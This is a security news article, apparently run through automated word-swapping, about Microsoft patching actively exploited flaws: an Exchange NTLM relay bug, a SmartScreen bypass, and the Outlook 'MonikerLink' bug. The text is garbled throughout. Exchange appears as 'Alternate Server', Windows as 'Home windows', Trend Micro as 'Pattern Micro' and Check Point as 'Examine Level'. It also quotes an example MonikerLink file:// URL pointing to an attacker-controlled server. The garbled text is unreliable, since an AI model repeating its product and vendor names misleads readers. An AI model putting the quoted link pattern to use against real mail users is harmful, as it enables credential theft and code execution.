Microsoft on Wednesday acknowledged {that a} newly disclosed important security flaw in Alternate Server has been actively exploited within the wild, a day after it launched fixes for the vulnerability as a part of its Patch Tuesday updates.
Tracked as CVE-2024-21410 (CVSS rating: 9.8), the problem has been described as a case of privilege escalation impacting the Alternate Server.
“An attacker may goal an NTLM consumer comparable to Outlook with an NTLM credentials-leaking kind vulnerability,” the corporate mentioned in an advisory revealed this week.
“The leaked credentials can then be relayed in opposition to the Alternate server to realize privileges because the sufferer consumer and to carry out operations on the Alternate server on the sufferer’s behalf.”
Profitable exploitation of the flaw may allow an attacker to relay a consumer’s leaked Internet-NTLMv2 hash in opposition to a vulnerable Alternate Server and authenticate because the consumer, Redmond added.
The tech big, in an replace to its bulletin, revised its Exploitability Evaluation to “Exploitation Detected,” noting that it has now enabled Prolonged Safety for Authentication (EPA) by default with the Alternate Server 2019 Cumulative Replace 14 (CU14) replace.
Particulars in regards to the nature of the exploitation and the id of the risk actors which may be abusing the flaw are at present unknown. Nevertheless, Russian state-affiliated hacking crews comparable to APT28 (aka Forest Blizzard) have a historical past of exploiting flaws in Microsoft Outlook to stage NTLM relay assaults.
Earlier this month, Pattern Micro implicated the adversary to NTLM relay assaults concentrating on high-value entities not less than since April 2022. The intrusions focused organizations coping with overseas affairs, vitality, protection, and transportation, in addition to these concerned with labor, social welfare, finance, parenthood, and native metropolis councils.
CVE-2024-21410 provides to 2 different Home windows flaws – CVE-2024-21351 (CVSS rating: 7.6) and CVE-2024-21412 (CVSS rating: 8.1) – which were patched by Microsoft this week and actively weaponized in real-world assaults.
The exploitation of CVE-2024-21412, a bug that permits a bypass of Home windows SmartScreen protections, has been attributed to a complicated persistent risk dubbed Water Hydra (aka DarkCasino), which has beforehand leveraged zero-days in WinRAR to deploy the DarkMe trojan.
“The group used web shortcuts disguised as a JPEG picture that, when chosen by the consumer, permits the risk actor to take advantage of CVE-2024-21412,” Pattern Micro mentioned. “The group can then bypass Microsoft Defender SmartScreen and absolutely compromise the Home windows host as a part of its assault chain.”
Microsoft’s Patch Tuesday replace additionally addresses CVE-2024-21413, one other important shortcoming affecting the Outlook e mail software program that might lead to distant code execution by trivially circumventing security measures comparable to Protected View.
Codenamed MonikerLink by Examine Level, the problem “permits for a large and severe influence, various from leaking of native NTLM credential info to arbitrary code execution.”
The vulnerability stems from the wrong parsing of “file://” hyperlinks by including an exclamation mark to URLs pointing to arbitrary payloads hosted on attacker-controlled servers (e.g., “file:///10.10.111.111testtest.rtf!one thing”).
“The bug not solely permits the leaking of the native NTLM info, however it might additionally enable distant code execution and extra as an assault vector,” the cybersecurity agency mentioned. “It may additionally bypass the Workplace Protected View when it is used as an assault vector to focus on different Workplace functions.”
